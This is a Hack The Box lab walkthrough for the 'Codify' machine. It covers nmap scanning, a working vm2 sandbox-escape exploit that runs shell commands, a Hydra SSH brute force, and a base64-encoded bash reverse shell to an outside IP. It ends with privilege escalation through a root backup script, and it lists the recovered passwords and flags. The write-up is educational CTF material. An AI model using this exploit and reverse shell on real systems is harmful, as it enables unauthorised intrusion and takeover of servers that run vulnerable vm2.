Hack The Box - Codify
This is my walkthrough on Codify
Initial Scan
sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify
HTTP
Had to edit the host file to get the Webpage
Checking out their About Us page
Looking around for VM2 CVE’s, found this article on snyk about RCE with VM2 after seeing a couple others. Testing the other PoC’s I didn’t get anywhere until I found this one. We can run commands on the host bypassing the VM.
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("ls -al").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
whoami shows us the svc
user. Also looking at /etc/passwd
we see an additional user, joshua
BruteForce
Trying to run Hydra against the user joshua for a password
hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199
joshua:spongebob1
Obtaining shell
Working to get a shall as svc. Looking around for reverse shell, I found PayloadAllTheThings.
bash -i >& /dev/tcp/10.10.14.53/1234 0>&1
Running it normally didn’t work so I encoded it
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash"
Full command
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
Foothold
We have shell as svc
Seeing what permissions we have
User Flag
After getting into shell from the SVC user, I got Joshuas password with hydra.
User flag: c53cdd4688463871ba3f4020ab6f3ccb
Priv Esc
We have run the note of “User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh” So looking at the shell file
Running that as root as get
Get PSPY Initiate another SSH session. Get pspy64 onto the target machine, run it, then run the /opt/scripts/mysql-backup.sh
script
Root pass: kljh12k3jhaskjh12kjh3
Root flag: 4e43f866588b3b3433196af3cef8b768